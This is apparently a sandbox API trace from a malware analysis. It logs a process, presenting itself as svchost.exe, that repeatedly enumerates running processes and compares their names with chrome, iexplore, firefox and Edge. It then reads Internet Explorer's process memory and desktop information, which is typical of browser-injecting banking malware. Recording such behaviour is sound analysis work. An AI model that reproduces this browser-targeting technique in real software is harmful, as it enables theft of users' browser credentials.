	[0236.114] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.115] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0236.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.115] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0236.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x774c
	[0236.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.117] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0236.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.117] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.117] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0236.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.118] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.118] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0236.119] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7750
	[0236.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.119] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0236.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.119] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0236.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.120] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0236.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.120] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.120] NtQueryInformationProcess (in: ProcessHandle=0x7750, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0236.120] ReadProcessMemory (in: hProcess=0x7750, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0236.120] ReadProcessMemory (in: hProcess=0x7750, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0236.121] ReadProcessMemory (in: hProcess=0x7750, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0236.121] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0236.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0236.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7754
	[0236.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.122] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0236.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0236.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0236.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.123] NtQueryInformationProcess (in: ProcessHandle=0x7754, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0236.123] ReadProcessMemory (in: hProcess=0x7754, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0236.123] ReadProcessMemory (in: hProcess=0x7754, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0236.124] ReadProcessMemory (in: hProcess=0x7754, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0236.124] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0236.124] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0236.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7758
	[0236.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.125] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0236.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.125] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.125] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0236.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.126] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.126] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0236.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x775c
	[0236.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.127] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0236.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.127] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.127] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0236.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.128] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7760
	[0236.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.129] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.129] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.129] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.130] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.131] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7764
	[0236.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.132] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.132] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.132] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.132] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.133] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7768
	[0236.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.134] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.134] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.134] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.134] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.135] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0236.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x776c
	[0236.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0236.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0236.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.137] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7770
	[0236.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.139] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.139] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.139] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.140] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.140] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7774
	[0236.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.141] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.141] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.142] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.142] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.142] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0236.143] CloseHandle (hObject=0x4fd0) returned 1
	[0236.143] Sleep (dwMilliseconds=0x64) 
	[0236.268] GetCurrentProcessId () returned 0x110
	[0236.268] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0236.271] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0236.271] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0236.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0236.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7778
	[0236.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.273] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.273] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.274] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.274] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0236.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x777c
	[0236.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.275] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.275] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.276] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.276] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0236.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7780
	[0236.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.277] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0236.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.277] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.278] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0236.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.279] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0236.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7784
	[0236.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.280] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.280] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.281] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.281] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.281] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0236.282] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7788
	[0236.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.282] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0236.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.282] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.283] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0236.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.283] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0236.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x778c
	[0236.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.284] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0236.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.284] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.285] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0236.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.285] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.285] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0236.286] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7790
	[0236.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.286] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0236.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.286] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.287] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0236.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.287] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.287] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0236.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7794
	[0236.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.288] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0236.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.288] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.289] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0236.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.289] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7798
	[0236.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.290] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.290] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.291] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.291] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x779c
	[0236.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.292] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.293] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.293] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.294] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
